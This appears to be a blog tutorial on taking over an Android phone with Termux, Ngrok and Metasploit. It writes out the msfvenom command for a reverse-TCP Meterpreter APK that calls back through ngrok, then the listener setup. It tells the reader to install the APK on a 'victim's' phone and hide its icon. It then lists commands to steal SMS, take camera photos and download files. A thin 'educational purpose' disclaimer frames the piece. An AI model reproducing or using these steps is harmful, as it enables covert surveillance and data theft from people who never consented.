How to Hack android phone using Termux with Metasploit

In this post, we are going to learn about how to hack android phones using termux with Metasploit. You can just copy-paste the commands one by one in the termux app and it will work perfectly.

NOTE: This post is only for educational purpose. I and this site do not support any criminal activity. If you are doing any sort of misuse of this information This site is not responsible for that. THIS SITE ONLY SUPPORT ETHICAL HACKING.


  1. Termux: If you wanna know about termux in Detail [What is termux? | Download termux]
  2. Metasploit: If you don't have Metasploit in your Termux[Install Metasploit in termux]

Port Forwarding using Ngrok in termux:​

If you wanna use Metasploit on LAN then you can skip this step(if you and your victim is connected to the same wifi then you can skip this step).

With the help of port forwarding, we can access the victim's phone by using mobile data which means if you are using Simcard then you have to do port forwarding to use Metasploit.

Step 1:
Go to Ngrok.com and create an account. if you already have an account at ngrok then log in.


Step 2:
Download the Ngrok zip file on your phone.It will be approx 12Mb file.

termux.ga (1).jpg

Step 3:
Now you will see a zip file that you have downloaded from the Ngrok website.
Open termux and navigate to that zip file. If it's not in your download folder or you can't see your download folder, just open the file manager and paste the zip file in your internal storage.and go to termux and cd storage.

How to hack android phone using Termux with Metasploit-2021.jpg

Step 4:
Type this command to copy the zip file in your Home directory of termux.
cp ngrok-stable-linux-arm.zip /$HOME

How to hack android phone using Termux with Metasploit-2021 (1).jpg

Step 5:
Type this command to go back to your home directory.
cd /$HOME

Step 6:
Type this command to unzip the file.
unzip ngrok-stable-linux-arm.zip


Step 7:
Go to Ngrok site again and copy the token,(please copy the full token)

termux.ga - ngroktoken.jpg

Step 8:
Open terminal and type this code and paste your token and press enter.
./ngrok authtoken

termux.ga (2).jpg

Step 9:
Type this command to start port forwarding on port 1275.
./ngrok tcp 1275
You can use any port number i am using 1275 here.

termux.ga (3).jpg

Step 10:
If you are also getting this error just open your hotspot and it will be fixed in 30 to 60 seconds.

How to hack android phone using Termux with Metasploit and Ngrok-2021.jpg

Create payload in Metasploit:​

The payload will be an apk file which we are going to install on the victim's phone. That will allow us to Acess the victim's android phone.

Step 1:
Open a new session in termux (just swipe your screen from left to right and click on new session). please make sure the termux have storage permission. type below commands if you don't have the storage permission.
Allow storage permission.


Step 2:
Type this command to create a payload and press Enter.

Please change your LHOST and LPORT as given in the below image.


msfvenom -p android/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=15181 R >/data/data/com.termux/files/home/storage/shared/Android.apk

WhatsApp Image 2020-01-12 at 2.59.23 PM.jpg

Step 3:
Go to your internal storage and you will see Android.apk.

Install this apk in the victim's phone.
termux.ga (4).jpg

Start Listener (msfconsole):

Step 1:

Type this command in termux windows to start the msfconsole.
It can take upto 30 sec to start.


Step 2:
Type this command to start the Multi handler in Metasploit.
use exploit/multi/handler

termux.ga (5).jpg

Step 3:
Type this command to set the payload.
set payload android/meterpreter/reverse_tcp


Step 4:
Now set the LHOST at which you wanna listen to the session.
If you are using ngrok port forwarding then enter this IP address but if you are not using port forwarding then enter your Local IP.


Step 5:
Now set the LPORT.
if you are using Ngrok then set the same port which you used while port forwarding.
if you are not using port forwarding then just enter the same port you used to create the payload.
set LPORT 1275


Step 6:
This is the last command and the phone will be Hacked.
It will connect to the victim and give you meterpreter session.


Some useful commands in Meterpreter.​

Find all the commands available:​

This command will give you a list of commands and a short description of that command.

termux.ga (6).jpg

Get SMS from the victim's phone to your phone:​

This command will give you the most recent 50 SMS from the victim,'s phone.
You will get a text file that contains all the SMS with details just use cat command to open the file.


Hide the icon of the Apk you send to the victim:​

If you are installing an app on the victim's phones then it obvious that the victim gonna notice that app and chances are the victim will uninstall the app.by using the below command you can hide the app icon from the victim's phone.

Change the audio mode of the victim's phone:​

you can set the phone on general mode by using the below command.
set_audio_mode -m 1
you can type set_audio_mode -m 0 to silent the phone.

Capture pictures from the victim's phone:​

This command will capture a photo from the victim's camera and send it to your storage folder.

Access file storage of the victims:​

You can navigate to the victim's file and see all the data in any folder.
cd /sdcard
you can type ls command to show directories

Download any file from the victim's phone:​

navigate to the file you wanna download and type this command
download file-name

So now you have a meterpreter session that means you have access to the victim's phone. but if the victim deleted the app then you can't access the phone again.
If you have any Questions you can ask Me in the comments thanks for reading and as always Stay Ethical Hacker.